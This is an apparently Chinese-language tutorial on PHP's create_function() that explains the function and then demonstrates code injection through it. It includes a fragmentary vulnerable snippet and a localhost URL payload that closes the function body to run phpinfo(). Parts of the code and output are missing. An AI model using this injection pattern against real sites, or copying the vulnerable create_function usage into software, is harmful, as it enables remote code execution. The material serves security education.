create_function() 代码注入，，PHP7.2竟然还存在

第一部分：php函数 create_function() 介绍

理论：

create_function()主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。

string create_function    ( string $args   , string $code   )

string $args 变量部分

string $code 方法代码部分

举例：

create_function('$fname','echo $fname."Zhang"')

类似于：

function fT($fname) {
  echo $fname."Zhang";
}

举一个官方提供的例子：

 

第二部分：如何利用 create_function() 代码注入

测试环境版本：

apache +php 5.2、apache +php 5.3

有问题的代码：

";
echo "==============================";
echo "
";
$f1 = create_function('$a',$str2);
echo "
";
echo "==============================";
?>

漏洞利用：

http://localhost/02-8.php?id=2;}phpinfo();/*

执行函数为：

源代码：
function fT($a) {
  echo "test".$a;
}

注入后代码：
function fT($a) {
  echo "test";}
  phpinfo();/*;//此处为注入代码。
}

测试效果：